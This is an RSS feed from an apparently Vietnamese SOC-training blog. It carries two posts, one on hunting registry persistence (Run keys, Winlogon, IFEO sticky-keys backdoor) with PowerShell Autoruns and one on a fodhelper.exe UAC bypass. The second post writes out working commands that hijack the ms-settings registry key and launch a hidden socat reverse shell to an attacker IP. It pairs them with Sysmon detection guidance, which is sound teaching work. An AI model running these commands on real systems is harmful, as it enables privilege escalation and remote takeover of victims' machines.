<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Malware Analysis on Roduygo | Blog</title><link>/categories/malware-analysis/</link><description>Recent content in Malware Analysis on Roduygo | Blog</description><generator>Hugo -- gohugo.io</generator><language>en</language><lastBuildDate>Fri, 08 May 2026 16:40:00 +0700</lastBuildDate><atom:link href="/categories/malware-analysis/index.xml" rel="self" type="application/rss+xml"/><item><title>Săn lùng Malware trong Registry</title><link>/post/san-lung-malware-registry/</link><pubDate>Fri, 08 May 2026 16:40:00 +0700</pubDate><guid>/post/san-lung-malware-registry/</guid><description>&lt;p&gt;Chào mừng các bạn tiếp tục với Series Giải phẫu Windows OS &amp;amp; SOC Analytics! Ở bài viết trước, chúng ta đã hiểu cơ chế hoạt động của Registry. Hôm nay, chúng ta sẽ bước vào một cuộc chiến thực sự: Săn lùng Malware. Một trong những mục tiêu tối thượng của mã độc sau khi xâm nhập thành công là Duy trì sự hiện diện (Persistence) - đảm bảo rằng dù người dùng có tắt máy hay khởi động lại, mã độc vẫn sẽ tự động kích hoạt. Nơi ẩn nấp lý tưởng nhất chính là Registry. Hãy cùng trang bị &amp;ldquo;vũ khí&amp;rdquo; PowerShell Autoruns để bóc trần những điểm neo này!&lt;/p&gt;
&lt;h2 id="1-kỹ-thuật-cắm-chốt-kinh-điển-auto-run-keys"&gt;1. Kỹ thuật &amp;ldquo;Cắm chốt&amp;rdquo; kinh điển: Auto Run Keys
&lt;/h2&gt;&lt;p&gt;Hầu hết các phần mềm độc hại, từ cơ bản đến phức tạp, đều lợi dụng các khóa tự khởi động (Auto Run) do Microsoft thiết kế để kích hoạt cùng hệ thống. Các khóa này được chia theo cấp độ phân quyền:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Mức độ người dùng (User Level):&lt;/strong&gt; &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;. Khóa này chỉ chạy mã độc khi người dùng hiện tại đăng nhập và không yêu cầu quyền Admin để ghi dữ liệu.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Mức độ hệ thống (Machine Level):&lt;/strong&gt; &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;. Khóa này chạy cho mọi người dùng trên máy nhưng bắt buộc mã độc phải có quyền Administrator hoặc SYSTEM mới có thể ghi vào đây. Việc mã độc ghi thành công vào khóa này chứng tỏ hệ thống đã bị leo thang đặc quyền.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Khóa &amp;ldquo;Dùng một lần&amp;rdquo; (RunOnce):&lt;/strong&gt; Tương tự như Run, nhưng hệ điều hành sẽ tự động xóa giá trị này ngay sau khi thực thi. Malware tinh vi thường dùng RunOnce để thực hiện các tập lệnh dọn dẹp dấu vết hoặc cài đặt sâu hơn vào hệ thống.&lt;/li&gt;
&lt;/ul&gt;

 &lt;blockquote&gt;
 &lt;p&gt;&lt;strong&gt;Góc nhìn SOC:&lt;/strong&gt; Khi mã độc ghi đè hoặc tạo mới giá trị thông qua các API như &lt;code&gt;RegSetValueEx&lt;/code&gt;, Windows sẽ ghi nhận sự kiện với Event ID 4657 (A registry value was modified), trong khi Sysmon sẽ ghi nhận Event ID 13 (Registry Value Set). Riêng với khóa RunOnce, bạn sẽ thấy log nổ ra 2 lần (một lần lúc tạo và một lần lúc Windows tự xóa), tương ứng với Sysmon ID 13 và Sysmon ID 12 (Object Deleted).&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h2 id="2-kỹ-thuật-ăn-bám-tiến-trình-hệ-thống-winlogon--userinit"&gt;2. Kỹ thuật ăn bám tiến trình hệ thống: Winlogon &amp;amp; Userinit
&lt;/h2&gt;&lt;p&gt;Thay vì tạo ra một khóa Registry mới dễ bị phát hiện, những kẻ tấn công khôn ngoan hơn sẽ &amp;ldquo;ký sinh&amp;rdquo; vào các tiến trình đăng nhập cốt lõi của Windows là Winlogon.&lt;/p&gt;
&lt;p&gt;Hacker thường nhắm vào hai đường dẫn sau tại &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;/code&gt;:&lt;/p&gt;
&lt;h3 id="21-ký-sinh-qua-userinit"&gt;2.1 Ký sinh qua Userinit
&lt;/h3&gt;&lt;p&gt;Mặc định, giá trị của khóa Userinit chỉ đơn giản là &lt;code&gt;userinit.exe&lt;/code&gt;. Tuy nhiên, khóa này có một tính năng đặc biệt (Comma-separated) cho phép nối nhiều đường dẫn với nhau bằng dấu phẩy. Hacker chỉ cần âm thầm chèn thêm một đoạn như &lt;code&gt;userinit.exe, C:\Users\Administrator\AppData\Local\Temp\789a.bat&lt;/code&gt;. Kết quả là hệ thống sẽ tự động &amp;ldquo;rước&amp;rdquo; mã độc vào máy một cách hoàn toàn hợp lệ ngay sau khi người dùng nhập mật khẩu.&lt;/p&gt;
&lt;h3 id="22-đánh-tráo-giao-diện-shell"&gt;2.2 Đánh tráo giao diện (Shell)
&lt;/h3&gt;&lt;p&gt;Khóa Shell có nhiệm vụ gọi giao diện màn hình làm việc (mặc định là &lt;code&gt;explorer.exe&lt;/code&gt;). Kẻ tấn công có thể thay thế hoàn toàn &lt;code&gt;explorer.exe&lt;/code&gt; bằng mã độc của chúng, hoặc nối thêm như &lt;code&gt;explorer.exe, C:\windows\temp\malware.exe&lt;/code&gt;.&lt;/p&gt;
&lt;h2 id="3-bóng-ma-cửa-sau-image-file-execution-options-ifeo"&gt;3. Bóng ma &amp;ldquo;Cửa sau&amp;rdquo;: Image File Execution Options (IFEO)
&lt;/h2&gt;&lt;p&gt;IFEO (&lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\&lt;/code&gt;) vốn là một tính năng được Microsoft thiết kế để các nhà phát triển gỡ lỗi (debug) ứng dụng của họ. Nhưng trong tay Hacker, IFEO biến thành công cụ leo thang đặc quyền và duy trì sự hiện diện cực kỳ đáng sợ.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Kịch bản tấn công Sticky Keys khét tiếng:&lt;/strong&gt; Hacker sẽ tạo một khóa con mang tên &lt;code&gt;sethc.exe&lt;/code&gt; (chương trình phím dính - Sticky Keys hiện lên khi bạn bấm Shift 5 lần) bên trong IFEO. Tại đây, chúng thêm một giá trị &lt;code&gt;Debugger&lt;/code&gt; trỏ thẳng tới &lt;code&gt;cmd.exe&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Kết quả? Ngay tại màn hình khóa Windows (khi chưa cần đăng nhập), hacker chỉ cần bấm phím Shift 5 lần. Thay vì hiện ra bảng Sticky Keys, hệ thống sẽ mở ra một cửa sổ Command Prompt với quyền lực tối cao là SYSTEM, cho phép hacker kiểm soát hoàn toàn máy tính!&lt;/p&gt;
&lt;h2 id="4-thực-chiến-săn-lùng-malware-với-powershell-autoruns"&gt;4. Thực chiến: Săn lùng Malware với PowerShell Autoruns
&lt;/h2&gt;&lt;p&gt;Việc mở &lt;code&gt;regedit.exe&lt;/code&gt; lên và kiểm tra bằng tay từng khóa là điều không tưởng đối với một SOC Analyst. Đó là lúc chúng ta cần đến Autoruns - một công cụ cực mạnh giúp soi quét mọi ngóc ngách tự khởi động của hệ thống.&lt;/p&gt;
&lt;p&gt;Trong môi trường PowerShell, bạn có thể gọi module &lt;code&gt;Get-PSAutorun&lt;/code&gt; kết hợp với tham số kiểm tra chữ ký số và xuất ra dạng bảng (GridView) để dễ theo dõi:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Get-PSAutorun -VerifyDigitalSignature | Out-GridView
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;img alt="autoruns đang quan sát các ứng dụng được ghi vào registry" class="gallery-image" data-flex-basis="462px" data-flex-grow="192" height="370" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="/post/san-lung-malware-registry/autoruns.png" width="713"&gt;&lt;/p&gt;
&lt;p&gt;Khi bảng dữ liệu hiện lên, bạn cần &amp;ldquo;lia mắt&amp;rdquo; ngay đến các cột sinh tử sau:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Signed (Đã ký số):&lt;/strong&gt; Nếu giá trị là False, hãy báo động đỏ! Mã độc hiếm khi có chữ ký số hợp lệ của các nhà phát hành uy tín.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;IsOSBinary:&lt;/strong&gt; Nếu là True, Windows xác nhận đây là tệp tin lõi của hệ điều hành.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Publisher:&lt;/strong&gt; Thông thường các tệp an toàn sẽ ghi là &lt;code&gt;CN=Microsoft Windows, O=Microsoft Corporation&lt;/code&gt;. Nếu cột này bị để trống hoặc ghi một cái tên mờ ám, đó là mục tiêu cần điều tra ngay.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="41-kỹ-thuật-so-sánh-baseline-điểm-chuẩn"&gt;4.1 Kỹ thuật so sánh Baseline (Điểm chuẩn)
&lt;/h3&gt;&lt;p&gt;Một kỹ năng cao cấp của Blue Team là so sánh Registry hiện tại với một bản sao lưu (Baseline) khi máy tính còn &amp;ldquo;sạch&amp;rdquo;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#75715e"&gt;# Bỏ qua các file chuẩn của OS và tạo bản Baseline&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Get-PSAutorun -VerifyDigitalSignature | Where { &lt;span style="color:#f92672"&gt;-not&lt;/span&gt;($_.isOSbinary)} | New-AutoRunsBaseLine -Verbose
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#75715e"&gt;# So sánh hệ thống hiện tại với bản Baseline cũ&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Compare-AutoRunsBaseLine -Verbose | Out-GridView
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Bằng lệnh so sánh này, mọi khóa Userinit bị chèn thêm mã độc (như file &lt;code&gt;.bat&lt;/code&gt; hay &lt;code&gt;.ps1&lt;/code&gt;) hoặc các khóa Run mới mọc lên sẽ bị phơi bày lập tức trong một cửa sổ GridView tách biệt, giúp bạn chẩn đoán hệ thống chỉ trong vài giây.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;em&gt;Windows Registry là một bãi mìn thực sự, nơi mã độc và hệ thống cài răng lược vào nhau. Việc làm chủ các điểm neo Persistence và thành thạo PowerShell Autoruns sẽ giúp bạn bóc tách được những vỏ bọc tinh vi nhất. Ở bài viết tiếp theo, chúng ta sẽ tìm hiểu cách mã độc vượt rào bảo mật bằng kỹ thuật UAC Bypass. Hãy cùng đón chờ!&lt;/em&gt;&lt;/p&gt;</description></item><item><title>Kỹ thuật UAC Bypass</title><link>/post/uac-bypass-fodhelper/</link><pubDate>Fri, 08 May 2026 12:00:00 +0700</pubDate><guid>/post/uac-bypass-fodhelper/</guid><description>&lt;p&gt;Chào mừng các bạn quay trở lại với Series Giải phẫu Windows OS &amp;amp; SOC Analytics! Hôm nay, chúng ta đã tìm hiểu UAC là &amp;ldquo;người gác cổng&amp;rdquo; tuyệt vời với cơ chế Secure Desktop và Integrity Levels. Tuy nhiên, không có hệ thống nào là bất khả xâm phạm. Hôm nay, chúng ta sẽ trực tiếp đóng vai Hacker, lợi dụng chính những tính năng &amp;ldquo;tiện lợi&amp;rdquo; do Microsoft thiết kế để vượt mặt UAC một cách im lặng tuyệt đối (UAC Bypass), đồng thời học cách Blue Team &amp;ldquo;bắt tại htrận&amp;rdquo; ành vi này bằng Sysmon.&lt;/p&gt;
&lt;h2 id="1-gót-chân-achilles-của-uac-tính-năng-autoelevation"&gt;1. &amp;ldquo;Gót chân Achilles&amp;rdquo; của UAC: Tính năng AutoElevation
&lt;/h2&gt;&lt;p&gt;Để tránh làm phiền người dùng với quá nhiều bảng thông báo Yes/No, Microsoft đã thiết kế một tính năng gọi là Tự động nâng quyền (AutoElevation). Một số tệp thực thi cốt lõi của Windows (như &lt;code&gt;msconfig.exe&lt;/code&gt; hay &lt;code&gt;fodhelper.exe&lt;/code&gt;) được khai báo cờ &lt;code&gt;autoElevate&lt;/code&gt; bên trong tệp kê khai (manifest) của chúng. Khi những phần mềm này chạy, Windows tự động cấp cho chúng quyền Cao nhất (High Integrity) mà không thèm hiện bảng hỏi UAC.&lt;/p&gt;
&lt;p&gt;Hacker cực kỳ thích điều này. Nếu chúng có thể &amp;ldquo;bám đuôi&amp;rdquo; hoặc lừa một tiến trình autoElevate chạy mã độc hộ mình, mã độc đó sẽ nghiễm nhiên được kế thừa quyền High Integrity.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Tại sao lại là Fodhelper.exe?&lt;/strong&gt;
&lt;code&gt;Fodhelper.exe&lt;/code&gt; là một chương trình mặc định của Windows dùng để quản lý các tính năng tùy chọn (như thêm ngôn ngữ). Nó có cờ &lt;code&gt;autoElevate&lt;/code&gt;. Nhưng điểm khiến &lt;code&gt;fodhelper.exe&lt;/code&gt; trở thành &amp;ldquo;con mồi&amp;rdquo; hoàn hảo là: Không giống như msconfig cần phải mở giao diện đồ họa (GUI), fodhelper có thể bị lạm dụng thông qua một giao diện dòng lệnh (CLI) ngầm từ xa với quyền trung bình (Medium Integrity).&lt;/p&gt;
&lt;h2 id="2-cơ-chế-ký-sinh-registry-hijacking"&gt;2. Cơ chế &amp;ldquo;Ký sinh&amp;rdquo;: Registry Hijacking
&lt;/h2&gt;&lt;p&gt;Điểm yếu chí mạng của &lt;code&gt;fodhelper.exe&lt;/code&gt; nằm ở cách nó tìm kiếm ứng dụng để mở. Khi hoạt động, tiến trình này sẽ liên tục quét vào Registry để tìm một khóa cụ thể liên quan đến giao thức &lt;code&gt;ms-settings&lt;/code&gt; (URL Protocol mở cửa sổ Settings của Windows).&lt;/p&gt;
&lt;p&gt;Đường dẫn mà fodhelper tìm kiếm là: &lt;code&gt;HKCU\Software\Classes\ms-settings\Shell\Open\command&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Lỗ hổng nằm ở đâu?&lt;/strong&gt; Đường dẫn này nằm trong nhánh &lt;code&gt;HKEY_CURRENT_USER&lt;/code&gt; (HKCU). Đây là nhánh cấu hình riêng của người dùng hiện tại, do đó không cần quyền Admin vẫn có thể ghi đè vào đây. Hacker (đang ở quyền Medium) chỉ cần ghi đường dẫn mã độc của chúng vào khóa này, sau đó kích hoạt &lt;code&gt;fodhelper.exe&lt;/code&gt;. Tiến trình này tự động được nâng lên quyền High Integrity, sau đó nó ngây thơ đọc Registry và chạy mã độc của hacker với quyền lực tối cao.&lt;/p&gt;
&lt;h2 id="3-thực-chiến-đóng-vai-hacker-lách-luật-uac"&gt;3. Thực chiến: Đóng vai Hacker lách luật UAC
&lt;/h2&gt;&lt;p&gt;Bây giờ, chúng ta sẽ thực hiện kịch bản tấn công: Tạo một Reverse Shell (kết nối ngược) về máy chủ của hacker (ví dụ: máy Kali Linux có IP 10.48.95.226) bằng công cụ &lt;code&gt;socat&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Tại cửa sổ CMD quyền thấp (Medium Integrity) trên máy nạn nhân, hacker thực hiện các lệnh sau:&lt;/p&gt;
&lt;h3 id="bước-1-thiết-lập-biến-môi-trường-và-tải-trọng-payload"&gt;Bước 1: Thiết lập biến môi trường và Tải trọng (Payload)
&lt;/h3&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-cmd" data-lang="cmd"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;:&lt;span style="color:#75715e"&gt;: Trỏ đến vị trí Registry mà Fodhelper sẽ đọc&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#66d9ef"&gt;set&lt;/span&gt; REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;:&lt;span style="color:#75715e"&gt;: Thiết lập mã độc: Dùng PowerShell chạy ẩn công cụ socat để mở cổng 4444 kết nối về máy Hacker&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#66d9ef"&gt;set&lt;/span&gt; CMD=&lt;span style="color:#e6db74"&gt;&amp;#34;powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:10.48.95.226:4444 EXEC:cmd.exe,pipes&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
 &lt;blockquote&gt;
 &lt;p&gt;[Ghi chú: Lệnh trên thiết lập mã độc kết nối về IP của Hacker thông qua cổng 4444]&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h3 id="bước-2-chìa-khóa-delegateexecute-đặt-bẫy"&gt;Bước 2: Chìa khóa &amp;ldquo;DelegateExecute&amp;rdquo; (Đặt bẫy)
&lt;/h3&gt;&lt;p&gt;Đây là thủ thuật qua mặt hệ thống tinh vi nhất. Hacker chạy lệnh sau:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-cmd" data-lang="cmd"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;reg add %REG_KEY% /v &lt;span style="color:#e6db74"&gt;&amp;#34;DelegateExecute&amp;#34;&lt;/span&gt; /d &lt;span style="color:#e6db74"&gt;&amp;#34;&amp;#34;&lt;/span&gt; /f
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Lệnh này tạo một giá trị tên là &lt;code&gt;DelegateExecute&lt;/code&gt; nhưng để trống. Việc tạo giá trị này nhằm tắt cơ chế COM object chuẩn của Windows (chỉ định mã CLSID), buộc fodhelper phải quay lại đọc giá trị &amp;ldquo;Mặc định&amp;rdquo; (Default) của khóa command. Nếu thiếu dòng này, kỹ thuật Bypass sẽ thất bại.&lt;/p&gt;
&lt;h3 id="bước-3-ghi-mã-độc-và-kích-hoạt"&gt;Bước 3: Ghi mã độc và Kích hoạt
&lt;/h3&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-cmd" data-lang="cmd"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;:&lt;span style="color:#75715e"&gt;: Ghi đè mã độc vào giá trị mặc định của khóa Registry&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;reg add %REG_KEY% /d %CMD% /f
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;:&lt;span style="color:#75715e"&gt;: Khởi chạy fodhelper để nó &amp;#34;cắn câu&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;C:\Windows\System32\fodhelper.exe
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Ngay khi &lt;code&gt;fodhelper.exe&lt;/code&gt; chạy, nó đọc Registry, thấy &lt;code&gt;DelegateExecute&lt;/code&gt; trống, bèn gọi lệnh &lt;code&gt;socat&lt;/code&gt;. Tại máy Kali Linux đang mở cổng lắng nghe (&lt;code&gt;nc -lvp 4444&lt;/code&gt;), Hacker nhận được một Shell với quyền Administrator cao nhất mà màn hình nạn nhân không hề chớp nháy hay hiện bảng UAC nào!&lt;/p&gt;

 &lt;blockquote&gt;
 &lt;p&gt;[Ghi chú: Chèn ảnh minh họa cửa sổ Netcat bên máy Kali Linux nhận được kết nối Reverse Shell từ máy Windows vào đây]&lt;/p&gt;

 &lt;/blockquote&gt;
&lt;h2 id="4-góc-nhìn-soc-bắt-tại-trận-bằng-sysmon"&gt;4. Góc nhìn SOC: &amp;ldquo;Bắt tại trận&amp;rdquo; bằng Sysmon
&lt;/h2&gt;&lt;p&gt;Hacker có thể qua mặt được UAC, nhưng không thể vô hình trước &amp;ldquo;mắt thần&amp;rdquo; Sysmon. Khi kịch bản UAC Bypass via Registry Hijacking này xảy ra, hệ thống Sysmon sẽ nổ ra một chuỗi cảnh báo (Alert) liên tục:&lt;/p&gt;
&lt;h3 id="41-bắt-quả-tang-hành-vi-sửa-registry-event-id-12--13"&gt;4.1 Bắt quả tang hành vi sửa Registry (Event ID 12 &amp;amp; 13)
&lt;/h3&gt;&lt;p&gt;Vì hacker phải tạo khóa và ghi giá trị vào Registry, Sysmon sẽ ghi nhận:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Event ID 12 (Registry object added):&lt;/strong&gt; Ghi nhận việc nhánh &lt;code&gt;ms-settings\Shell\Open\command&lt;/code&gt; vừa được tạo mới.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Event ID 13 (Registry value set):&lt;/strong&gt; Ghi nhận việc một tiến trình lạ vừa đặt giá trị &lt;code&gt;DelegateExecute&lt;/code&gt; và chèn mã lệnh &lt;code&gt;powershell... socat...&lt;/code&gt; vào Registry.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="42-bắt-quả-tang-tiến-trình-con-bất-thường-event-id-1"&gt;4.2 Bắt quả tang tiến trình con bất thường (Event ID 1)
&lt;/h3&gt;&lt;p&gt;Event ID 1 (Process Create) là chốt chặn cuối cùng. Khi xem log, SOC Analyst sẽ thấy một chuỗi logic cực kỳ đáng ngờ:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Tiến trình cha (ParentImage):&lt;/strong&gt; Là &lt;code&gt;C:\Windows\System32\fodhelper.exe&lt;/code&gt; (chạy với IntegrityLevel: High).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Tiến trình con (Image):&lt;/strong&gt; Lại là &lt;code&gt;powershell.exe&lt;/code&gt; hoặc &lt;code&gt;socat.exe&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Một phần mềm quản lý cài đặt ngôn ngữ (&lt;code&gt;fodhelper.exe&lt;/code&gt;) lại đi gọi &lt;code&gt;powershell.exe&lt;/code&gt; chạy ẩn để gọi tiếp &lt;code&gt;socat.exe&lt;/code&gt; kết nối ra IP bên ngoài qua cổng 4444? Đây là dấu hiệu 100% của việc lạm dụng tiến trình hệ thống để leo thang đặc quyền!&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;em&gt;Bypass UAC thông qua Fodhelper.exe và Registry Hijacking là một kỹ thuật kinh điển nhưng vẫn vô cùng hiệu quả, minh chứng cho việc hacker biến chính &amp;ldquo;tính năng&amp;rdquo; tiện lợi của Windows thành &amp;ldquo;vũ khí&amp;rdquo;. Việc hiểu sâu cơ chế này kết hợp với khả năng phân tích Event ID của Sysmon sẽ giúp bạn viết ra những tập luật (Rule) SIEM cực kỳ sắc bén. Ở các bài viết tiếp theo, chúng ta sẽ chính thức bước vào phân tích Network Forensics và cách giải mã các gói tin độc hại. Hãy cùng chờ đón nhé!&lt;/em&gt;&lt;/p&gt;</description></item></channel></rss>